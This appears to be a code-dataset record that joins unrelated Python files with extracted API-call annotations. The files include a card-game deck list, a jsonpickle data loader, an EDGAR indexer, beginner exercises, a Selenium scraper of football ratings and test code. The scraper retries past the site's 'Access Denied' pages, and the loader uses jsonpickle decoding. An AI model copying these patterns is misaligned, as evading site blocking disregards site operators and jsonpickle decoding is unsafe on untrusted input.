Card, Game\n'), ((817, 855), 'framework.Card', 'Card', (['"""Pot of Desires"""', 'CardType.SPELL'], {}), "('Pot of Desires', CardType.SPELL)\n", (821, 855), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((870, 908), 'framework.Card', 'Card', (['"""Upstart Goblin"""', 'CardType.SPELL'], {}), "('Upstart Goblin', CardType.SPELL)\n", (874, 908), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((940, 990), 'framework.Card', 'Card', (['"""Nibiru, the Primal Being"""', 'CardType.MONSTER'], {}), "('Nibiru, the Primal Being', CardType.MONSTER)\n", (944, 990), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1001, 1054), 'framework.Card', 'Card', (['"""Ash Blossom & Joyous Spring"""', 'CardType.MONSTER'], {}), "('Ash Blossom & Joyous Spring', CardType.MONSTER)\n", (1005, 1054), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1066, 1116), 'framework.Card', 'Card', (['"""Ghost Ogre & Snow Rabbit"""', 'CardType.MONSTER'], 
{}), "('Ghost Ogre & Snow Rabbit', CardType.MONSTER)\n", (1070, 1116), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1129, 1172), 'framework.Card', 'Card', (['"""Droll & Lock Bird"""', 'CardType.MONSTER'], {}), "('Droll & Lock Bird', CardType.MONSTER)\n", (1133, 1172), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1186, 1225), 'framework.Card', 'Card', (['"""Effect Veiler"""', 'CardType.MONSTER'], {}), "('Effect Veiler', CardType.MONSTER)\n", (1190, 1225), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1238, 1283), 'framework.Card', 'Card', (['"""PSY-Framegear Gamma"""', 'CardType.MONSTER'], {}), "('PSY-Framegear Gamma', CardType.MONSTER)\n", (1242, 1283), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1297, 1339), 'framework.Card', 'Card', (['"""PSY-Frame Driver"""', 'CardType.MONSTER'], {}), "('PSY-Frame Driver', CardType.MONSTER)\n", (1301, 1339), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1351, 1386), 'framework.Card', 'Card', (['"""D.D. Crow"""', 'CardType.MONSTER'], {}), "('D.D. Crow', CardType.MONSTER)\n", (1355, 1386), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1399, 1454), 'framework.Card', 'Card', (['"""Ghost Belle & Haunted Mansion"""', 'CardType.MONSTER'], {}), "('Ghost Belle & Haunted Mansion', CardType.MONSTER)\n", (1403, 1454), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1469, 1508), 'framework.Card', 'Card', (['"""Skull Meister"""', 'CardType.MONSTER'], {}), "('Skull Meister', CardType.MONSTER)\n", (1473, 1508), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1522, 1566), 'framework.Card', 'Card', (['"""Infinite Impermanence"""', 'CardType.TRAP'], {}), "('Infinite Impermanence', CardType.TRAP)\n", (1526, 1566), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1592, 1631), 'framework.Card', 'Card', (['"""Dark Magician"""', 'CardType.MONSTER'], {}), "('Dark Magician', CardType.MONSTER)\n", (1596, 1631), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1647, 1694), 'framework.Card', 'Card', (['"""Red-Eyes Black Dragon"""', 'CardType.MONSTER'], {}), "('Red-Eyes Black Dragon', CardType.MONSTER)\n", (1651, 1694), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1705, 1744), 'framework.Card', 'Card', (['"""Red-Eyes Fusion"""', 'CardType.SPELL'], {}), "('Red-Eyes Fusion', CardType.SPELL)\n", (1709, 1744), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1770, 1812), 'framework.Card', 'Card', (['"""Magicalized Fusion"""', 'CardType.SPELL'], {}), "('Magicalized Fusion', CardType.SPELL)\n", (1774, 1812), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1837, 1883), 'framework.Card', 'Card', (['"""<NAME>, the Knighted"""', 'CardType.MONSTER'], {}), "('<NAME>, the Knighted', CardType.MONSTER)\n", (1841, 1883), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1898, 1939), 'framework.Card', 'Card', (['"""Forbidden Droplet"""', 'CardType.SPELL'], {}), 
"('Forbidden Droplet', CardType.SPELL)\n", (1902, 1939), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1953, 1996), 'framework.Card', 'Card', (['"""Called by the Grave"""', 'CardType.SPELL'], {}), "('Called by the Grave', CardType.SPELL)\n", (1957, 1996), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2011, 2049), 'framework.Card', 'Card', (['"""Cosmic Cyclone"""', 'CardType.SPELL'], {}), "('Cosmic Cyclone', CardType.SPELL)\n", (2015, 2049), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2063, 2110), 'framework.Card', 'Card', (['"""Harpie\'s Feather Duster"""', 'CardType.SPELL'], {}), '("Harpie\'s Feather Duster", CardType.SPELL)\n', (2067, 2110), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2130, 2166), 'framework.Card', 'Card', (['"""Mind Control"""', 'CardType.SPELL'], {}), "('Mind Control', CardType.SPELL)\n", (2134, 2166), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2180, 2222), 'framework.Card', 'Card', (['"""Ice Dragon\'s Prison"""', 'CardType.TRAP'], {}), '("Ice Dragon\'s Prison", CardType.TRAP)\n', (2184, 2222), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2238, 2276), 'framework.Card', 'Card', (['"""Solemn Judgment"""', 'CardType.TRAP'], {}), "('Solemn Judgment', CardType.TRAP)\n", (2242, 2276), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2309, 2351), 'framework.Card', 'Card', (['"""Union Carrier"""', 'CardType.EXTRA_DECK'], {}), "('Union Carrier', CardType.EXTRA_DECK)\n", (2313, 2351), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2366, 2415), 'framework.Card', 'Card', (['"""Salamangreat Almiraj"""', 'CardType.EXTRA_DECK'], {}), "('Salamangreat Almiraj', CardType.EXTRA_DECK)\n", (2370, 2415), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2429, 2471), 'framework.Card', 'Card', (['"""Secure Gardna"""', 'CardType.EXTRA_DECK'], {}), "('Secure Gardna', CardType.EXTRA_DECK)\n", (2433, 2471), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2486, 2548), 'framework.Card', 'Card', (['"""Artemis, the Magistus Moon Maiden"""', 'CardType.EXTRA_DECK'], {}), "('Artemis, the Magistus Moon Maiden', CardType.EXTRA_DECK)\n", (2490, 2548), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2563, 2607), 'framework.Card', 'Card', (['"""Invoked Mechaba"""', 'CardType.EXTRA_DECK'], {}), "('Invoked Mechaba', CardType.EXTRA_DECK)\n", (2567, 2607), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2624, 2670), 'framework.Card', 'Card', (['"""Invoked Augoeides"""', 'CardType.EXTRA_DECK'], {}), "('Invoked Augoeides', CardType.EXTRA_DECK)\n", (2628, 2670), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2687, 2733), 'framework.Card', 'Card', (['"""Invoked Purgatrio"""', 'CardType.EXTRA_DECK'], {}), "('Invoked Purgatrio', CardType.EXTRA_DECK)\n", (2691, 2733), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2746, 2794), 'framework.Card', 'Card', (['"""Psy-framelord Omega"""', 
'CardType.EXTRA_DECK'], {}), "('Psy-framelord Omega', CardType.EXTRA_DECK)\n", (2750, 2794), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2807, 2861), 'framework.Card', 'Card', (['"""Predaplant Verte Anaconda"""', 'CardType.EXTRA_DECK'], {}), "('Predaplant Verte Anaconda', CardType.EXTRA_DECK)\n", (2811, 2861), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2876, 2926), 'framework.Card', 'Card', (['"""Red-Eyes Dark Dragoon"""', 'CardType.EXTRA_DECK'], {}), "('Red-Eyes Dark Dragoon', CardType.EXTRA_DECK)\n", (2880, 2926), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((3933, 4422), 'framework.DeckList', 'DeckList', (['((aleister, 3), (invocation, 2), (meltdown, 3), (terraforming, 1), (prison,\n 2), (imperm, 3), (ash, 3), (souls, 3), (dm, 2), (red_eyes, 2), (ref, 3),\n (magicalized_fusion, 1), (candina, 1), (corobane, 1), (lightstage, 1),\n (cyclone, 2), (judgment, 2), (upstart, 1), (duster, 1), (mind_control, \n 1), (set_rotation, 1), (called, 1))', '((almiraj, 1), (artemis, 1), (gardna, 1), (mechaba, 2), (purgatrio, 1), (\n augoeides, 1), (omega, 1), (dragoon, 2), (verte, 2))'], {}), '(((aleister, 3), (invocation, 2), (meltdown, 3), (terraforming, 1),\n (prison, 2), (imperm, 3), (ash, 3), (souls, 3), (dm, 2), (red_eyes, 2),\n (ref, 3), (magicalized_fusion, 1), (candina, 1), (corobane, 1), (\n lightstage, 1), (cyclone, 2), (judgment, 2), (upstart, 1), (duster, 1),\n (mind_control, 1), (set_rotation, 1), (called, 1)), ((almiraj, 1), (\n artemis, 1), (gardna, 1), (mechaba, 2), (purgatrio, 1), (augoeides, 1),\n (omega, 1), (dragoon, 2), (verte, 2)))\n', (3941, 4422), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n')]
|
"""
data.py
Contains and owns the loading and in-memory storage of all of the
pre-defined game data.
:author: <NAME>
:license: MIT, see LICENSE.txt for more details.
"""
import json
import jsonpickle
import gzip
Technologies = {}
Language_Map = {}
def load_language_map(filepath):
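    """Populate the module-level Language_Map from a plain JSON file."""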
f = open(filepath, "r")
Language_Map.update(json.load(f))
f.close()
def load_technologies(filepath):
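    """Populate the module-level Technologies from a gzipped jsonpickle file."""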
f = gzip.open(filepath, "rb")
contents = f.read()
f.close()
Technologies.update(jsonpickle.decode(contents, keys=True))
def load_tutorial_game(tutorial_filepath):
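    """Load and return the pre-built tutorial game from a gzipped jsonpickle file."""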
f = gzip.open(tutorial_filepath, "rb")
contents = f.read()
f.close()
game = jsonpickle.decode(contents, keys=True)
return game
|
[
"jsonpickle.decode",
"json.load",
"gzip.open"
] |
[((429, 454), 'gzip.open', 'gzip.open', (['filepath', '"""rb"""'], {}), "(filepath, 'rb')\n", (438, 454), False, 'import gzip\n'), ((610, 644), 'gzip.open', 'gzip.open', (['tutorial_filepath', '"""rb"""'], {}), "(tutorial_filepath, 'rb')\n", (619, 644), False, 'import gzip\n'), ((695, 733), 'jsonpickle.decode', 'jsonpickle.decode', (['contents'], {'keys': '(True)'}), '(contents, keys=True)\n', (712, 733), False, 'import jsonpickle\n'), ((358, 370), 'json.load', 'json.load', (['f'], {}), '(f)\n', (367, 370), False, 'import json\n'), ((517, 555), 'jsonpickle.decode', 'jsonpickle.decode', (['contents'], {'keys': '(True)'}), '(contents, keys=True)\n', (534, 555), False, 'import jsonpickle\n')]
|
from django.conf import settings
from import_export import resources, fields
from .models import Match
class MatchResource(resources.ModelResource):
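    """import-export resource that flattens Match rows (team names, logs,
    visualizer URL) for export."""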
team1 = fields.Field(attribute='team1__name',
column_name='team1')
team2 = fields.Field(attribute='team2__name',
column_name='team2')
winner = fields.Field(attribute='winner__name',
column_name='winner')
game_log = fields.Field()
server_log = fields.Field()
visualizer_url = fields.Field()
class Meta:
model = Match
fields = ('team1', 'team2', 'winner', 'infra_token', 'game_log',
'server_log', 'visualizer_url')
def dehydrate_game_log(self, obj: Match):
return obj.game_log
def dehydrate_server_log(self, obj: Match):
return obj.server_log
def dehydrate_visualizer_url(self, obj: Match):
return f'{settings.VISUALIZER_URL}{obj.game_log}'
|
[
"import_export.fields.Field"
] |
[((165, 223), 'import_export.fields.Field', 'fields.Field', ([], {'attribute': '"""team1__name"""', 'column_name': '"""team1"""'}), "(attribute='team1__name', column_name='team1')\n", (177, 223), False, 'from import_export import resources, fields\n'), ((261, 319), 'import_export.fields.Field', 'fields.Field', ([], {'attribute': '"""team2__name"""', 'column_name': '"""team2"""'}), "(attribute='team2__name', column_name='team2')\n", (273, 319), False, 'from import_export import resources, fields\n'), ((358, 418), 'import_export.fields.Field', 'fields.Field', ([], {'attribute': '"""winner__name"""', 'column_name': '"""winner"""'}), "(attribute='winner__name', column_name='winner')\n", (370, 418), False, 'from import_export import resources, fields\n'), ((460, 474), 'import_export.fields.Field', 'fields.Field', ([], {}), '()\n', (472, 474), False, 'from import_export import resources, fields\n'), ((492, 506), 'import_export.fields.Field', 'fields.Field', ([], {}), '()\n', (504, 506), False, 'from import_export import resources, fields\n'), ((528, 542), 'import_export.fields.Field', 'fields.Field', ([], {}), '()\n', (540, 542), False, 'from import_export import resources, fields\n')]
|
import os
import json
BASE_DIR = r'D:\data\edgar\sampling\Archives\edgar\data'
if __name__ == '__main__':
index = dict()
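    # walk BASE_DIR/<cik>/<accession>/<fileName> and index each filing by accession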
for cik in os.listdir(BASE_DIR):
for accession in os.listdir(os.path.join(BASE_DIR, cik)):
for fileName in os.listdir(os.path.join(BASE_DIR, cik, accession)):
index[accession] = {
"cik": cik,
"accession": accession,
"fileName": fileName
}
with open('index_by_accession.json', 'w') as index_json:
json.dump(index, index_json)
|
[
"json.dump",
"os.path.join",
"os.listdir"
] |
[((141, 161), 'os.listdir', 'os.listdir', (['BASE_DIR'], {}), '(BASE_DIR)\n', (151, 161), False, 'import os\n'), ((550, 578), 'json.dump', 'json.dump', (['index', 'index_json'], {}), '(index, index_json)\n', (559, 578), False, 'import json\n'), ((199, 226), 'os.path.join', 'os.path.join', (['BASE_DIR', 'cik'], {}), '(BASE_DIR, cik)\n', (211, 226), False, 'import os\n'), ((268, 306), 'os.path.join', 'os.path.join', (['BASE_DIR', 'cik', 'accession'], {}), '(BASE_DIR, cik, accession)\n', (280, 306), False, 'import os\n')]
|
x = 237
a = int(x / 100)
x = x - 100 * a
b = int(x / 10)
x = x - 10 * b
c = x
Resultat = a + b * 10 + c * 100
print(Resultat)
# >>> 732
L = [12, 8, 19, 7, 3, 10]
Resultat = [20 - L[i] for i in range(len(L))]
print(Resultat)
## >>> [8, 12, 1, 13, 17, 10]
Resultat = 0
for i in range(5):
Resultat += i + 1
print(Resultat)
## >>> 15
L = [i for i in range(10)]
for i in range(len(L)):
if i >= 1:
L[i] = L[i] + L[i - 1]
Resultat = L
print(Resultat)
## >>> [0, 1, 3, 6, 10, 15, 21, 28, 36, 45]
Val, i = 0, 0
L = [7, 14, 21, 45, 52, 67, 89, 99]
while Val <= 50:
i += 1
Val = L[i]
Resultat = [i, Val]
print(Resultat)
## >>> [4, 52]
Somme = 0
n = 10
for i in range(n):  # the colon was missing
    Somme += i  # the indentation was wrong
print(Somme)  # the capital S in Somme was missing
## >>>> 45
from math import pi
Rayon = float(input("Rayon [m] ? > "))  # the "" quotes were missing
Aire = pi * Rayon ** 2  # the exponent is written **, not ^
Perimetre = 2 * pi * Rayon  # the capital R in Rayon was missing
print(f"Aire: {Aire}, Périmètre: {Perimetre}")  # f-strings!
# Rayon [m] ? > 45
# >>> Aire: 6361.725123519331, Périmètre: 282.7433388230814
import random
n = 10000
L = [random.randint(0, 1000) for i in range(n)]
a = 0
b = 0
c = 0
for i in range(len(L)):
if L[i] < 500:
a += 1
elif L[i] > 500: # else if ~> elif
b += 1
else:
c += 1
print(a, b, c)
##3 Non-functional code
a = 25
b = 226
a = max(a, b)
b = min(a, b)
r = a
i = 0
while r >= b:
i += 1
r -= b
print(a, " = ", b, " * ", i, "+", r)
##1
a = 25
b = 226
a1 = max(a, b)
b = min(a, b)
r = a1
i = 0
while r >= b:
i += 1
r -= b
print(a1, " = ", b, " * ", i, " + ", r)
# 4 Writing code
# the function decompose(l) takes a list l of integers as a parameter and returns two lists
def decompose(l):
rp, ri = [], []
for i in range(len(l)):
if l[i] % 2 == 0:
rp.append(l[i])
else:
ri.append(l[i])
return rp, ri
#
## a function present(l, a) that takes a list of integers l and an integer a as parameters and returns the number of multiples of a in the list.
def present(l, a):
c = 0
for i in range(len(l)):
if l[i] % a == 0:
c += 1
return c
|
[
"random.randint"
] |
[((1198, 1221), 'random.randint', 'random.randint', (['(0)', '(1000)'], {}), '(0, 1000)\n', (1212, 1221), False, 'import random\n')]
|
import setuptools
with open("README.md", "r", encoding="UTF-8") as fh:
long_description = fh.read()
setuptools.setup(
name="file-explorer",
version="0.0.0",
author="WangTingZheng",
author_email="<EMAIL>",
description="A simple python cli file browser",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/WangTingZheng/explorer",
packages=setuptools.find_packages(),
install_requires=["pick"],
entry_points={"console_scripts": ["explorer = explorer.command:main"]},
)
|
[
"setuptools.find_packages"
] |
[((436, 462), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (460, 462), False, 'import setuptools\n')]
|
#Given 2 points (x1,y1) and (x2,y2), where x1, x2 are x-coordinates
#and y1, y2 are y-coordinates of the points.
#Your task is to compute the Euclidean distance between them.
#The distance computed should be precise up to 2 decimal places.
from math import sqrt
def compute_distance(x1, y1, x2, y2):
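    """Return the Euclidean distance between (x1, y1) and (x2, y2)."""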
distance = sqrt((x2-x1)**2 + (y2-y1)**2)
return distance
def main():
T = int(input())
d = []
for i in range(0,T):
(x1, y1, x2, y2) = map(int, input().split(" "))
d.append(compute_distance(x1,y1,x2,y2))
for i in range(0,T):
print("Distance: %.2f" %d[i])
if __name__=='__main__':
try: main()
except: pass
|
[
"math.sqrt"
] |
[((318, 355), 'math.sqrt', 'sqrt', (['((x2 - x1) ** 2 + (y2 - y1) ** 2)'], {}), '((x2 - x1) ** 2 + (y2 - y1) ** 2)\n', (322, 355), False, 'from math import sqrt\n')]
|
# ---------------------------------------------------------------------------- #
# World Cup: Stats scanner
# Ver: 0.01
# ---------------------------------------------------------------------------- #
#
# Code by <NAME>
#
# ---------------------------------------------------------------------------- #
import os
import numpy as np
import pandas as pd
import re
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import TimeoutException, NoSuchElementException, WebDriverException
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from time import sleep
os.chdir("/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA")
'''
browser = webdriver.Firefox()
browser.get("https://www.whoscored.com/Regions/247/Tournaments/36/Seasons/5967/Stages/15737/Show/International-FIFA-World-Cup-2018")
sleep(3)
base_url = 'https://www.whoscored.com'
def get_countries_links(browser):
return [team.get_attribute('href') for team in browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')]
countries_link = set()
countries_link.update(get_countries_links(browser))
browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')[0].get_attribute('href')
# click next page
browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click()
sleep(1)
countries_link.update(get_countries_links(browser))
# click next page
browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click()
sleep(1)
countries_link.update(get_countries_links(browser))
#countries_link
player_link = dict()
for country_link in countries_link:
browser.get(country_link)
sleep(1)
team = browser.find_element_by_xpath('//span[@class="team-header-name"]')
player_link[team.text] = dict()
for player in browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//tbody//tr//a'):
player_link[team.text][player.text] = player.get_attribute('href')
np.save("Data/player_link.npy", player_link)
'''
def detect_element(browser, element_id, by_what = By.ID):
# Simplify the detection of an element in the browser
element_present = EC.presence_of_element_located((by_what, element_id))
try:
WebDriverWait(browser, 5, poll_frequency = .1).until(element_present)
return True
except TimeoutException as e:
return False
player_link = np.load("Data/player_link.npy").item()
# reload the ratings saved by an earlier run (np.save at the end of this
# script) so the scrape can resume; without this, rating_dict is undefined here
rating_dict = np.load("Data/rating_dict.npy").item()
# will delete nan from already_loaded; copy each inner dict so that popping
# from already_loaded cannot mutate rating_dict[team] while it is iterated
already_loaded = {team: players.copy() for team, players in rating_dict.items()}
for team in rating_dict.keys():
    for player in rating_dict[team]:
        if pd.isnull(rating_dict[team][player]):
            already_loaded[team].pop(player, None)
#caps = DesiredCapabilities().FIREFOX
caps = DesiredCapabilities.CHROME
caps["pageLoadStrategy"] = "none"
#rating_dict = {team:{} for team in player_link.keys()}
browser = webdriver.Chrome(desired_capabilities = caps)#Firefox(capabilities=caps)
for team in player_link.keys():
for player in player_link[team].keys():
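        # skip players whose rating was already scraped on a previous run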
if player in already_loaded[team].keys(): continue
while True:
try:
browser.get(player_link[team][player])
wait = WebDriverWait(browser, 20)
wait.until(EC.presence_of_element_located((By.XPATH, '//table[@id="top-player-stats-summary-grid"]')))
browser.execute_script("window.stop();")
try:
rating_dict[team][player] = browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//td[@class="rating"]')[-1].text
print(rating_dict[team][player])
break
except IndexError:
try:
iframe = browser.find_element_by_xpath('//iframe')
                        browser.switch_to.frame(iframe)  # switch_to_frame() is deprecated
browser.find_element_by_xpath('//p[contains(text(), "Access Denied")]')
sleep(5)
                    except NoSuchElementException:
                        rating_dict[team][player] = np.nan
                        break  # no rating on the page; record NaN and move to the next player
except TimeoutException:
sleep(5)
np.save("Data/rating_dict.npy", rating_dict)
print(rating_dict['Saudi Arabia'])  # spot-check one team's scraped ratings
|
[
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.support.expected_conditions.presence_of_element_located",
"numpy.load",
"numpy.save",
"pandas.isnull",
"time.sleep",
"selenium.webdriver.Chrome",
"os.chdir"
] |
[((897, 1001), 'os.chdir', 'os.chdir', (['"""/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA"""'], {}), "(\n '/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA'\n )\n", (905, 1001), False, 'import os\n'), ((3265, 3308), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'desired_capabilities': 'caps'}), '(desired_capabilities=caps)\n', (3281, 3308), False, 'from selenium import webdriver\n'), ((4577, 4621), 'numpy.save', 'np.save', (['"""Data/rating_dict.npy"""', 'rating_dict'], {}), "('Data/rating_dict.npy', rating_dict)\n", (4584, 4621), True, 'import numpy as np\n'), ((2570, 2623), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (['(by_what, element_id)'], {}), '((by_what, element_id))\n', (2600, 2623), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((2807, 2838), 'numpy.load', 'np.load', (['"""Data/player_link.npy"""'], {}), "('Data/player_link.npy')\n", (2814, 2838), True, 'import numpy as np\n'), ((3001, 3037), 'pandas.isnull', 'pd.isnull', (['rating_dict[team][player]'], {}), '(rating_dict[team][player])\n', (3010, 3037), True, 'import pandas as pd\n'), ((2642, 2687), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['browser', '(5)'], {'poll_frequency': '(0.1)'}), '(browser, 5, poll_frequency=0.1)\n', (2655, 2687), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((3594, 3620), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['browser', '(20)'], {}), '(browser, 20)\n', (3607, 3620), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((3648, 3742), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (['(By.XPATH, \'//table[@id="top-player-stats-summary-grid"]\')'], {}), '((By.XPATH,\n \'//table[@id="top-player-stats-summary-grid"]\'))\n', (3678, 3742), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((4555, 4563), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (4560, 4563), False, 'from time import sleep\n'), ((4382, 4390), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (4387, 4390), False, 'from time import sleep\n')]
|
"""
Configuration module containing pytest-specific hooks.
"""
import os
import logging
from . import helpers
from _pytest.config import Config as PyTestConfig
from dof_discord_bot.src.logger import Log
from dof_discord_bot.src import logger
def _reconfigure_logging():
"""
Helper function used to redirect all logging into the tests-specific log folder.
Accesses the private method of `logger` to avoid repeating the code.
"""
# Clear existing logs
for file_name in os.listdir(helpers.LOG_DIR):
if file_name.endswith(".log"):
os.remove(os.path.join(helpers.LOG_DIR, file_name))
# noinspection PyProtectedMember
logger._configure(log_directory=helpers.LOG_DIR)
Log._logger = logging.getLogger("dof-discord-bot")
Log.info("Logging has been reconfigured")
def pytest_configure(config: PyTestConfig):
"""
Configuration hook which reconfigures the logging and calls the global setup function.
"""
_reconfigure_logging()
helpers.setup()
Log.info("Pytest configuration hook finished successfully")
def pytest_unconfigure(config: PyTestConfig):
"""
Configuration hook which calls the global teardown function.
"""
helpers.teardown()
Log.info("Pytest unconfiguration hook finished successfully")
# An explicit "kill" of current process to ensure clean exit in case of errors when stopping the code
os._exit(0)
|
[
"dof_discord_bot.src.logger.Log.info",
"dof_discord_bot.src.logger._configure",
"os._exit",
"os.path.join",
"os.listdir",
"logging.getLogger"
] |
[((494, 521), 'os.listdir', 'os.listdir', (['helpers.LOG_DIR'], {}), '(helpers.LOG_DIR)\n', (504, 521), False, 'import os\n'), ((668, 716), 'dof_discord_bot.src.logger._configure', 'logger._configure', ([], {'log_directory': 'helpers.LOG_DIR'}), '(log_directory=helpers.LOG_DIR)\n', (685, 716), False, 'from dof_discord_bot.src import logger\n'), ((735, 771), 'logging.getLogger', 'logging.getLogger', (['"""dof-discord-bot"""'], {}), "('dof-discord-bot')\n", (752, 771), False, 'import logging\n'), ((776, 817), 'dof_discord_bot.src.logger.Log.info', 'Log.info', (['"""Logging has been reconfigured"""'], {}), "('Logging has been reconfigured')\n", (784, 817), False, 'from dof_discord_bot.src.logger import Log\n'), ((1022, 1081), 'dof_discord_bot.src.logger.Log.info', 'Log.info', (['"""Pytest configuration hook finished successfully"""'], {}), "('Pytest configuration hook finished successfully')\n", (1030, 1081), False, 'from dof_discord_bot.src.logger import Log\n'), ((1238, 1299), 'dof_discord_bot.src.logger.Log.info', 'Log.info', (['"""Pytest unconfiguration hook finished successfully"""'], {}), "('Pytest unconfiguration hook finished successfully')\n", (1246, 1299), False, 'from dof_discord_bot.src.logger import Log\n'), ((1411, 1422), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1419, 1422), False, 'import os\n'), ((584, 624), 'os.path.join', 'os.path.join', (['helpers.LOG_DIR', 'file_name'], {}), '(helpers.LOG_DIR, file_name)\n', (596, 624), False, 'import os\n')]
|
import copy
import os
import unittest
import networkx as nx
from attacksurfacemeter import utilities
from attacksurfacemeter.call import Call
from attacksurfacemeter.call_graph import CallGraph
from attacksurfacemeter.environments import Environments
from attacksurfacemeter.loaders.cflow_loader import CflowLoader
from attacksurfacemeter.loaders.gprof_loader import GprofLoader
class UtilitiesTestCase(unittest.TestCase):
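    """Exercises attacksurfacemeter.utilities: fix(), the fragment helpers,
    and get_node_attrs() across cflow/gprof scenarios."""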
def test_fix(self):
# Arrange
target = CallGraph.from_loader(
CflowLoader(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'helloworld/cflow.callgraph.r.mod.txt'
),
True
)
)
_target = copy.deepcopy(target)
reference = CallGraph.from_loader(
GprofLoader(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'helloworld/gprof.callgraph.txt'
)
)
)
expected = {
'before': Call('GreeterSayHi', '', Environments.C),
'after': Call('GreeterSayHi', './src/helloworld.c', Environments.C)
}
# Act
utilities.fix(target, using=reference)
actual = {
'before': next(
i
for (i, _) in _target.nodes
if i.function_name == 'GreeterSayHi'
),
'after': next(
i
for (i, _) in target.nodes
if i.function_name == 'GreeterSayHi'
)
}
# Assert
self.assertEqual(expected['before'], actual['before'])
self.assertEqual(expected['after'], actual['after'])
# Asserting if node attributes got carried over
self.assertCountEqual(
[
attrs
for (i, attrs) in _target.nodes
if i == expected['before']
],
[
attrs
for (i, attrs) in target.nodes
if i == expected['after']
]
)
# Asserting if edge attributes got carried over
self.assertCountEqual(
[
attrs
for (i, j, attrs) in _target.edges
if i == expected['before'] or j == expected['before']
],
[
attrs
for (i, j, attrs) in target.edges
if i == expected['after'] or j == expected['after']
],
)
# Asserting if OTHER nodes and their attributes got carried over
self.assertCountEqual(
[
(i, attrs)
for (i, attrs) in _target.nodes
if i != expected['before']
],
[
(i, attrs)
for (i, attrs) in target.nodes
if i != expected['after']
]
)
# Asserting if OTHER edges and their attributes got carried over
self.assertCountEqual(
[
(i, j, attrs)
